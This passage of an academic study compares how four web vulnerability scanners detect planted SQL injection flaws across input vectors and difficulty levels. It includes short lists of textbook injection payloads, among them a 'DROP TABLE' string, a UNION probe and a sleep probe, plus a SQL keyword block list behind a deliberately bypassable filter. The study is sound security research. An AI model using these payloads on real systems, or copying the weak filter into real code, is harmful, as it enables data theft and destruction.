The most effective way to test vulnerability scanners is to run them against applications that we already have analyzed Curphey and Arawo [2006]. By doing so, we both test that the vulnerability scanner has the capacity to detect vulnerabilities in the application, and we can make a direct comparison between the result given by the scanner and the expected result, which is known in advance. In this experiment these scans are performed against a custom-built web application in which we have carefully chosen and validated the presence of all vulnerabilities so that they actually are exploitable.

The dependent variable which will be measured is the number of correct alarms about detected vulnerabilities in the web application. The experiment will follow a univariate analysis procedure: basically, only the change in detection rate is observed when one of the independent variables is changed while keeping the others constant. The tests are repeated several times with different values for each of the independent variables every time. In this experiment the dependent variable is the number of correct alarms produced and the independent variables are: SQL injection vulnerability, input vector, difficulty of exploitation, and scanner Keppel and Wickens [1973].

There are a number of nuisance variables that could influence the results but which are of no particular interest for this experiment. In other words, this experiment will not assess how they influence the number of correct alarms about found vulnerabilities. The known nuisance variables (experience, DBMS, barriers, exploited action, time investment) are treated by either repeatedly assigning a random value to them or keeping them constant during the experiment. For example, we make the assumption that the user of the tools will be the development team itself – we assume the user in this case can configure the tools to scan according to the underlying implementation details of the tested system. All relevant variables and their treatment in the experiment are summarized in table 3.1.

Table 3.1: Experiment variables

Variable | Type | Treatment
Detection rate | Dependent | Measured by comparing reports to known vulnerabilities.
SQL Injection vulnerabilities | Qualitative independent | Exhaustive list: piggy-backed queries, tautologies, alternative encoding, and logically incorrect queries.
Input vector | Qualitative independent | Alternate HTTP verbs: GET, POST.
Difficulty of Exploitation | Qualitative independent | Three levels: Easy, Medium, Hard.
Scanner | Qualitative independent | Selected alternatives: w3af, IBM AppScan, Netsparker, and Acunetix.
Time investment | Nuisance | The scanner is prepared according to its manual. The time required is noted.
Experience | Nuisance | The order of scanner usage is randomly selected for each vulnerability.
DBMS | Nuisance | Kept constant (MySQL).
Scan Barriers | Nuisance | Kept constant (no barriers in test).

3.2 Dependent variables

The experiments measure how one or more dependent variables respond to changes in the other (independent) variables. In this experiment we expect the dependent variable to pass from one form to another when we make changes to the independent variables. In our particular case the dependent variable is the number of correct alarms that the scanners have produced during their scans, i.e. the detection rate. This can be measured directly by comparing the reported vulnerabilities with the list of known vulnerabilities in the test bench.
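Computing the detection rate from a scanner report is then straightforward; a minimal sketch follows (the case identifiers and the report format are made up for illustration, not the actual test-bench format):

```python
def detection_rate(reported, known):
    """Share of known vulnerabilities present in the scanner's report.

    Findings outside the known list (duplicates, out-of-scope alarms
    such as XSS) are ignored, mirroring the experiment's filtering step.
    """
    return len(set(reported) & set(known)) / len(known)

# Hypothetical run: 17 known cases, the scanner reports 13 of them plus noise.
known = {f"case-{i}" for i in range(1, 18)}
reported = {f"case-{i}" for i in range(1, 14)} | {"xss-1", "case-3"}
print(f"{detection_rate(reported, known):.0%}")  # 76%
```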

3.3 Independent variables

The independent variables describe variables of interest for the experiment which are assumed to influence the dependent variable. The independent variables in this experiment are: SQL injection vulnerability, Input vector, Difficulty of Exploitation, and Scanner. The first three are related to the system being scanned and the last to the scanning procedure. In an experiment the independent variables need to be controlled and varied; how this is done for each variable is described in the following sections.

3.3.1 SQL Injection Vulnerabilities

To better understand and distinguish between different SQL injection types we need a system for classifying the different SQL injections we are describing. The types of vulnerabilities to include in the tests are chosen according to the selected taxonomy, which is based on the attacker's Intent, the Input Source, and the Technical Aspect of the attack itself Sun et al. [2007].

In the experiment we can influence the vulnerabilities that are tested by the scanners. The chosen vulnerabilities are implemented as test cases in the experiment. The vulnerability scanners will try to exploit these test cases in order to trigger vulnerabilities in the application. All vulnerabilities in the experiment were complemented with tests containing working exploits that could automatically verify the presence of each of the vulnerabilities in the system. These tests therefore define the baseline for positive vulnerabilities in the application when evaluating the scanners. The vulnerabilities are chosen to require the scanners to perform SQL injections by exploiting the application with the following SQL injection classes:

Vulnerability type | Description
Piggy-Backed Queries | See section 2.1.3.3
Tautologies | See section 2.1.3.1
Alternate Encoding | See section 2.1.3.7
Illegal/Logically Incorrect Queries | See section 2.1.3.2

In addition to these four SQL injection classes, the vulnerabilities are chosen to represent different functional goals and to have different injectable data types (text, number, and date fields). For a complete classification of all vulnerability cases, see Table B.2.
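As an illustration of the four classes, the following textbook-style payloads (not the exact strings used in the experiment) target a query such as SELECT * FROM users WHERE name = '<input>':

```python
# Illustrative payloads per SQL injection class, assuming the vulnerable
# query SELECT * FROM users WHERE name = '<input>'.
PAYLOADS = {
    # Tautology: make the WHERE clause always evaluate to true.
    "tautology": "' OR '1'='1",
    # Piggy-backed query: terminate the statement and append a second one.
    "piggy_backed": "'; DROP TABLE users; --",
    # Illegal/logically incorrect query: a lone quote breaks the syntax and
    # may provoke an error message that leaks schema information.
    "logically_incorrect": "'",
    # Alternate encoding: hide characters from naive filters, e.g. via char().
    "alternate_encoding": "' OR char(49)=char(49) --",
}

for cls, payload in PAYLOADS.items():
    print(f"{cls:20s} {payload}")
```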


3.3.2 Input vector

The scanner has to probe an input source to reach the vulnerable part of the application. The input vectors can be varied according to: injections through user input, cookies, server variables, or second-order injection (injecting data into the application that is used in an insecure manner at a later execution stage). The input vectors can be controlled as a qualitative independent variable where we can vary how the exploit should be sent to reach the vulnerability. The variable is limited to only the GET and POST verbs. This limitation comes from the fact that data submission using cookies and second-order injections would add complexity to the application, thus adding a scan barrier. Additionally, server variables can only be changed by reconfiguring the web server, and such tasks are out of the scope of the experiment. Only testing the GET and POST verbs is still reasonable; together they represent the most common ways to submit user input from forms and links to a web application.

Input type | Description
GET | The GET method is used to retrieve information from a specified URL. The GET method should not have side effects that can alter the state of the application, so we should not be required to roll back the application state for each test. The GET method accepts user input in the form of a query string (URLs which contain a "?").
POST | The POST method is used to submit data to the application. The origin server should perform the action requested by the POST method and redirect the client to the appropriate result.
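For the scanner, the practical difference is where the payload travels: in the URL's query string for GET, in the request body for POST. A standard-library sketch (the parameter name id and the host are made up for illustration):

```python
from urllib.parse import urlencode

payload = "' OR '1'='1"
params = {"id": payload}

# GET: the payload is URL-encoded into the query string.
get_url = "http://testapp.example/item?" + urlencode(params)

# POST: the same encoding goes into the request body instead.
post_body = urlencode(params).encode("ascii")

print(get_url)   # http://testapp.example/item?id=%27+OR+%271%27%3D%271
print(post_body)
```

A scanner that only mutates URLs will therefore never exercise form handlers that read the request body, which is exactly the failure mode observed later in the experiment.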

3.3.3 Difficulty of Exploitation

The exploitability (i.e. the difficulty of triggering a vulnerability with an exploit) can be varied by introducing a layer of protection mechanisms in the application. We can expect that the number of detected vulnerabilities depends on how easily the application can be exploited. By adding increased protection to the vulnerabilities we see how the scanner responds to increased difficulty and limitations. When sanitization is used, the following rules apply. The input is sanitized by escaping special characters (e.g. apostrophes). Characters used for comments are removed from the input; this includes the characters / (forward slash) and * (asterisk). A sequence of - (dashes) is replaced with a single - to protect against the line comment -- (double dash). We also remove SQL keywords from the input. Keywords include EXEC, EXECUTE, SELECT, INSERT, UPDATE, DELETE, UNION, JOIN, CREATE, ALTER, DROP, RENAME, TRUNCATE, BACKUP, and RESTORE. Limiting the use of these keywords should protect the system from the most common forms of SQL injection. This requires the scanner to use some sort of alternative encoding or fuzzing technique to circumvent the protection mechanism. The protection mechanism is designed to be sufficient but not totally secure, therefore allowing specially crafted input to bypass the security check and still trigger the vulnerability.

The tests are classified into three different levels, in ascending order, where Hard is the most difficult to exploit:

Difficulty class | Description
Easy | The system does not have any additional security constraints.
Medium | Introduces input sanitizing in the system as described above.
Hard | In addition to the input sanitization introduced by the Medium difficulty, also applies pattern matching to the input, which requires considerable effort from the attacker to pass SQL statements into the system without first altering the encoding.
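The exact patterns used at the Hard level are not given in the text; as an illustration, strict whitelist matching on a date field might look like this hypothetical check:

```python
import re

# Hypothetical whitelist for a date input field (ISO-style yyyy-mm-dd).
DATE_PATTERN = re.compile(r"\d{4}-\d{2}-\d{2}")

def accept_date(value: str) -> bool:
    """Accept only input that is exactly a date-shaped string."""
    return DATE_PATTERN.fullmatch(value) is not None

print(accept_date("2014-03-14"))              # True
print(accept_date("2014-03-14' OR '1'='1"))   # False
```

Input that fails the pattern never reaches the SQL query, which is why an attacker (or scanner) must find an encoding that still matches the pattern to get a payload through.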

3.3.4 Scanner

The scanners themselves should also be considered as a variable, which makes them a qualitative independent variable. The reason behind this is that there are many factors associated with a scanner, such as usability, scanning methods and techniques, vulnerability signatures, and so on. As these factors cannot be tested independently, due to issues of isolating and separating them, the entire scanner is treated as a single independent entity. A reasonable assumption is therefore that the scanners will differ in their capabilities and scanning techniques. These factors could give a particular scanner an advantage over the other scanners.

The scanners chosen for evaluation in this experiment are: w3af, IBM AppScan, Netsparker, and Acunetix. This list of scanners may seem small, but putting w3af aside, these three were the only commercial scanners that we had available in full versions when the test was performed.

3.4 Nuisance variables

There are factors that influence the value of the dependent variables other than those we are interested in. These factors are called nuisance variables and could cause variation in the outcome of the experiments Keppel and Wickens [1973].

3.4.1 Experience and time investment

As previously stated, the results depend on the previous experience an operator has in the scanning field. If the operator has good prior knowledge of how vulnerability scanners work, he can probably scan the application better than someone who doesn't have that experience. To handle this issue, the order in which the scanners are used is chosen at random, the vulnerabilities are divided into smaller sets, and these subsets are also scanned in random order. These steps are repeated until all combinations have been tested and then the results are finalized. By selecting the order of scanners at random, it's assumed the operator will have roughly the same prior experience regardless of which scanner he operates. By also choosing the set of vulnerabilities to scan at random, any specialized experience the operator gains with a particular kind of vulnerability is rendered useless for the next. This procedure was repeated until all scanners had been tested against all vulnerability sets, with an equal amount of time investment.

It is possible to improve the result of a scanner by investing more time into tuning the scanner to the scanned system and providing customized instructions to it. The strategy for controlling this variable is to configure all scanners in accordance with their manuals, even if it takes a lot of time. Although the time requirement was considered a nuisance variable, it was still recorded and is reported as a side result of the study.

3.4.2 Choice of Database management system

This variable is kept constant by using MySQL as DBMS in all tests.

3.4.3 Scan Barriers

The purpose of this experiment is not to test the scope of functionality for a set of scanners but instead to test the ability to detect certain types of vulnerabilities. Therefore scan barriers will not be tested, as this would only contribute additional configuration of the tools on how to interact with the web application. The influence of scan barriers will therefore not be addressed in this experiment. The variable is kept constant during the experiment in the sense that all possible barriers are removed from the application. In other words, no authentication, logic, or proxies are present between the scanner and the vulnerabilities.

3.4.4 Exploited Action

The goal of an exploit is to perform some action upon the application. An action could for example be a read operation, impersonation of a user, or interruption of service. A scanner will not support all of these possible action types, and knowing what all these action types are in advance is not reasonable, as every attacker will have different goals. Nevertheless, we need to design test cases that cover the most typical action types, such as read operations, which are a threat against confidentiality, and write operations, which threaten integrity. This issue was addressed by including at least one test case covering each typical operation.

4 Result

This chapter presents the result of the experiment. It has been split into sections for each of the independent variables. After presenting the result for each independent variable and its influence on the dependent variable, we will look at each interaction between the variables and how they influence the result of each other.

The data in this chapter is based on the observations made during the experiments. After the experiment was performed, all data produced during the scans was collected and assembled. The data was filtered to remove duplicates and vulnerabilities that were outside the scope of the application, such as Cross Site Scripting vulnerabilities. The remaining data gives the number of true positives detected by the scanners. A complete table of all observations made during the experiment is available in Appendix A, with additional tables of grouped data used to analyze the interactions between the variables in Appendix B. The grouped data tables contain the same data as the complete tables; it is only presented in a different format.

4.1 Difficulty of Exploitation

When comparing the detection rate to the difficulty of exploiting the system, it is possible to see how the performance of the scanners gets worse with each step, as illustrated by the diagram in figure 4.1. The diagram also shows that there is little difference between the detection rates of the scanners when the tested application treats all data unchecked as is (Easy difficulty, 67%) compared to when it sanitizes the input (Medium difficulty, 60%). When data validation is added to the process of sanitizing the input (Hard difficulty), a considerable difference can be observed. The scanners detect about one third fewer vulnerabilities than in the Medium case, 37% compared to 60%.

Figure 4.1: Mean detection rate per difficulty level

4.2 Scanner

When looking at the detection rate between the scanners we can clearly see a big difference and also a pattern. The two leading scanners, IBM and Acunetix, tied with a detection rate of 77%. Netsparker took third place with a detection rate of 36%, and not far behind came w3af with 30% of all vulnerabilities detected. These results are illustrated in figure 4.2.

4.3 Input vector

Comparing the two input vectors used for data submission in the experiment, as done in figure 4.3, there is a considerable difference between the number of detected vulnerabilities when using GET requests (71%) as input vector compared to using POST requests (38%).

4.4 SQL vulnerabilities

The detection rate per vulnerability case varied as illustrated in figure 4.4. The scanners were best at detecting vulnerabilities 1, 2, 3, 4, 7, and 8, with a detection rate of 75%. The other vulnerabilities had the following detection rates in descending order: cases 5 and 17, 71%; cases 6, 9, and 13, 63%; cases 11, 12, and 14, 58%; case 16, 54%; case 15, 33%; case 10, 0%. Clearly, these results show that the type of vulnerability that is tested influences the result of the scanner. The type of vulnerability and input data type for each case is available as a table in Appendix B. The best results were observed for vulnerability cases 1-4, which all accepted text as input (A-Z case insensitive, numbers 0-9, and common delimiters in text), and cases 7 and 8, which match the input against numerical expressions. With the exception of case 15, all date validation cases (11-15) had a similar detection rate. No scanner detected the 10th vulnerability case, which relied on a character encoding error.

Figure 4.2: Mean detection rate per scanner

Figure 4.3: Mean detection rate per input vector

Figure 4.4: Detection rate per vulnerability case

4.5 Interactions and variables importance

When two or more variables together influence the dependent variable, it is said that they interact. For example, the impact on a variable (e.g. coffee taste) from another variable (e.g. bean quality) may depend on the value of a third variable (e.g. water temperature). In this section we investigate interactions among the independent variables in the experiment. It should be noted that the result reported here is the result of an explorative process – no structured method was used to assess interactions.


Table 4.1: Detection rate for the scanners when testing GET requests

GET | w3af | IBM | Netsparker | Acunetix | Max(All) | Mean
Easy | 76% | 94% | 94% | 88% | 94% | 88%
Medium | 71% | 88% | 71% | 82% | 88% | 78%
Hard | 29% | 47% | 53% | 59% | 59% | 47%

Table 4.2: Detection rate for the scanners when testing POST requests

POST | w3af | IBM | Netsparker | Acunetix | Max(All) | Mean
Easy | 0% | 94% | 0% | 88% | 94% | 46%
Medium | 0% | 88% | 0% | 82% | 88% | 43%
Hard | 0% | 47% | 0% | 59% | 59% | 26%

4.5.1 The importance of input vector when comparing difficulty and scanners

The combined results with the detection rate in each difficulty class per scanner are presented in table 4.1 and table 4.2 for GET and POST requests. The data behind these tables is available in Appendix B.

At a first look we can see that both w3af and Netsparker didn't score any results for the POST method. We can also observe that the IBM and Acunetix scanners got the same detection rate for both the GET and POST cases. As it turns out, the w3af and Netsparker scanners did not support data submission using the POST method, and therefore they don't score any results. This also explains the observation made in section 4.3 when comparing the detection rates between the input vectors. Given that two of the scanners are "broken", we will only look at the difference for the GET vector from here on.

Looking at the results when scanning with GET requests in table 4.1, it is clearly visible that the scanners performed about the same within each of the difficulty classes. This can be confirmed by looking at the standard deviation for the scanners, which shows that for the easiest difficulty the deviation is small, but as the difficulty increases this error increases. However, by excluding the first scanner, the difference between the scanners becomes smaller and therefore the error between them decreases. As the measured detection rate for the first scanner is lower than or equal to that of the other scanners across all difficulties, it is safe to say that w3af was the worst scanner tested.


Figure 4.5: Detection rate per scanner for easy, medium, and hard difficulty

One could therefore assume there would be a difference between these values, as only the method of data submission differed. However, as seen in the summarized tables, there is a significant difference between different scanners, but not between the sets of vulnerabilities. After further study of the collected data from the experiment, the conclusion was clear. The two scanners that did not detect vulnerabilities using POST requests did in fact never once try to perform data submission using the POST method, and therefore failed those tests entirely. The other scanners that did support POST submission treated those tests in the same manner as the GET submissions, and therefore no difference was observed between them.

4.5.2 Difference in Detection rate between Vulnerabilities

The 17 vulnerabilities can be partitioned by where the vulnerable part of the SQL query is located and by the data type of the affected field (see table B.2). Figure 4.6 shows how the detected vulnerabilities are distributed between Orderby, Bypass, UNION, Command, Boolean, and Encoding statements. There are no detections for the Encoding statements, as this corresponds to case 10 shown in figure 4.4. Figure 4.7 is quite interesting: it shows how the detected vulnerabilities are distributed by the data type of the vulnerable field in the query. An important observation is the results for the vulnerabilities using date fields. In that case, almost none of the vulnerabilities with hard difficulty of exploitation were detected, while the detection rate was about the same between the difficulties for the vulnerabilities that used textual or numeric data fields.

Figure 4.6: Detection rate per vulnerability class type

Figure 4.7: Detection rate per vulnerable field data type

5 Discussion

This chapter states the main findings and addresses possible shortcomings with the experiment.

5.1 Summary of variable influence

As can be expected, the experiment shows that the detection rate for vulnerability scanning depends on how complex the application is and which scanner is used. In addition, it was shown that when choosing a scanner it is important to check that the scanner supports the input vectors that we want to test on the web application.

5.1.1 Input vector

Given the result from the experiment, we observed great differences between the mean numbers of detected vulnerabilities for the two input vectors that were tested (figure 4.3). This is due to the fact that two of the four scanners didn't support scanning using POST, while the other two passed all tests with results similar to the GET cases. It is probably an easy task for the vendors of the two scanners to add support for POST scanning. Until such time, we can say that it is important to verify that the scanner chosen to scan a web application supports the input vectors used by the application. As long as the application doesn't use any POST actions, we can choose any of the four scanners evaluated in this experiment to scan the application.


5.1.2 Scanner

It shouldn't come as any surprise that the detection rates of different scanners differ. As we don't have many scanners in this experiment, we don't have much to go on when comparing with other scanners. In figure 4.2 we can see that the detection rate between the four scanners varied a lot. However, given a closer look at the data, we can see that the difference between the scanners is more distributed than it looks. Figure 4.5 shows the detection rate of vulnerabilities with an easy, medium, and hard difficulty of exploitation. It is true for all four scanners that the detection rate gets worse as the difficulty goes up.

5.1.3 Vulnerabilities

When looking at the vulnerabilities independently, as in figure 4.4, we can see that the detection rate varies between the different instances. On the other hand, the vulnerabilities can be grouped by function and by the data type of the injectable fields in the vulnerable query (illustrated in figure 4.6 and figure 4.7). The detection rate between different functions is quite similar, while the detection rate for the different data types clearly shows that it is difficult to detect hard vulnerabilities with injectable date fields in SQL queries. This is probably due to the fact that the parser of the DBMS will reject the query if the scanner submits ill-formatted or incorrect data types.

5.1.4 Difficulty of Exploitation

We can clearly say that the difficulty of exploitation influences the detection rate. Looking at figure 4.1, it is clearly visible that the detection rate decreases when the difficulty increases. We can compare figure 4.1 with figure 4.5 to strengthen this statement. In the first figure we can observe that the decrease in detection rate is smaller between Easy and Medium than between Medium and Hard, and in the second figure we can see that this holds for almost all scanners. An interesting observation from figure 4.5 is that the scanner with the best detection rate for vulnerabilities with hard difficulty is not the same as the scanner with the best detection rate for the Easy or Medium difficulties. This could be interpreted as the Acunetix scanner being better at detecting SQL injection attacks than IBM AppScan. Take into consideration whether you are scanning for depth or breadth.

5.1.5 Time

The time it took for each scanner to complete an entire scan of the web application is presented in table 5.1. It shows that the usual time to complete an entire scan is less than 15 minutes, which is fast enough to be performed as a background task by the operator. The Acunetix scanner, on the other hand, spent almost 6 hours scanning the same application and tied with IBM AppScan in the number of detected vulnerabilities; IBM AppScan completed the same task in about 10 minutes. It should be noted, though, that the Acunetix scanner achieved the highest detection rate for vulnerabilities with hard difficulty of exploitation, but this is probably because it spent 30 times more time scanning the application than the alternatives. Comparing w3af, IBM AppScan, and Netsparker by completion time, the detection rate increases with time. This is especially true for the vulnerabilities with hard difficulty of exploitation, but less obvious for the easy and medium cases.

Table 5.1: Completion time per scanner for a full scan of the application

Scanner        Completion time (Full scan)
w3af           2 minutes
IBM AppScan    9 ½ minutes
Netsparker     11 minutes
Acunetix       5 ¾ hours

5.2 Threats against Validity and Reliability

This section presents possible shortcomings and things that could have changed the outcome of the experiment if the influencing variables had been treated differently.

5.2.1 Vulnerabilities

Considering the detection rate, the scanners detected roughly the same number of vulnerabilities in each of the difficulty classes. However, as the choice of vulnerabilities included in the experiment influences this result, it is unclear whether the outcome would be the same if more vulnerabilities were added to the experiment. The experiments performed can only test for the presence of the chosen vulnerabilities, not their absence, since it is not reasonable to know every possible vulnerability in advance. Consequently, it is also not reasonable to expect that the chosen vulnerabilities provide complete coverage of all possible cases that exist in the real world.

5.2.2 Constant Database

The choice of which DBMS to test in the experiment was considered a nuisance variable. It was handled by keeping the DBMS constant throughout the entire experiment, using MySQL. This means that the results given in this study only represent how the chosen scanners performed under the precondition that MySQL is used as the DBMS. A better solution would have been to run all the tests against several DBMSes so that the variable could be treated as an independent variable. This approach would probably have yielded a more interesting result because of the additional independent variable. Nonetheless, it would also have increased the scope of the experiment, and therefore the time and complexity needed to complete it, so we chose to keep the variable constant instead.

5.2.3 The choice of scanners

The choice of vulnerability scanners in this experiment was not random; they were chosen on the basis of popularity. This can have some impact on the result if the experiment is repeated with different scanners. Had it been feasible, we would have chosen more scanners and repeated the experiment with them to obtain more data. Increasing the number of observations in the experiment would improve upon our existing results and thereby strengthen the experiment. On the other hand, what this experiment does tell us is how good these particular scanners are at detecting SQL injection vulnerabilities.

5.2.4 Experience and skill

The entire experiment is built around the experience and skill of the operator using the scanners. The operator's job was to configure the scanner before each test, a phase that might be influenced by the operator's experience and skill. Experience and skill are hard to quantify, and it is therefore difficult to judge what impact these variables have on the measured results. If the operators were replaced, the measured results might differ depending on the experience and skill the new operators have with the specific tools. Nonetheless, we did not repeat the experiment with different operators due to time constraints.

5.2.5 Inconsistent scanning behavior

The difficulty of exploitation variable is treated as an ordinal variable with the values Easy, Medium, and Hard. The variable was sorted in increasing order of difficulty, so a scanner that detects the most difficult variant of a vulnerability is expected to detect the easier variants as well. This was observed for all test cases except cases 16 and 17 for one of the scanners. The Netsparker scanner, which failed to detect the easier variants of the vulnerability, is either flawed in its crawling process or uses non-deterministic fuzzing techniques to detect vulnerabilities. If the fuzzing techniques were in fact non-deterministic, the scanner would detect vulnerabilities randomly and unpredictably. This is likely the case; had the fuzzing been deterministic, the scanner would have used the same exploit in all tests, which in turn would have detected the easier variants of the vulnerabilities. The same issues could apply to the crawling process.
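As an illustration of why non-determinism harms repeatability (a sketch only; the payload list and selection strategy are hypothetical and not taken from any of the tested scanners), a fuzzer that samples a random subset of payloads per scan may probe the same parameter with different payloads in different runs:

```python
import random

# Hypothetical payload pool: a tautology, a piggy-backed query,
# and a UNION-based probe.
PAYLOADS = [
    "' OR '1'='1",
    "'; SELECT SLEEP(5);--",
    "' AND 1=0 UNION SELECT NULL--",
]

def pick_payloads(rng: random.Random, k: int = 2) -> list:
    # A non-deterministic scanner draws a random subset of payloads
    # for each scan instead of trying all of them every time.
    return rng.sample(PAYLOADS, k)

# Two scans seeded differently need not exercise the same payloads,
# so a vulnerability detected in one scan can be missed in the next.
run1 = pick_payloads(random.Random(1))
run2 = pick_payloads(random.Random(7))
```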

During the experiment this scanner also showed problems when scanning the application. Between scans it was observed that the scanner probed different parts of the application each time, so multiple scans were needed to cover the entire test application. The issue is that a scanner which targets random parts of the application in each scan cannot be assumed to reach and probe the entire application in a single scan.
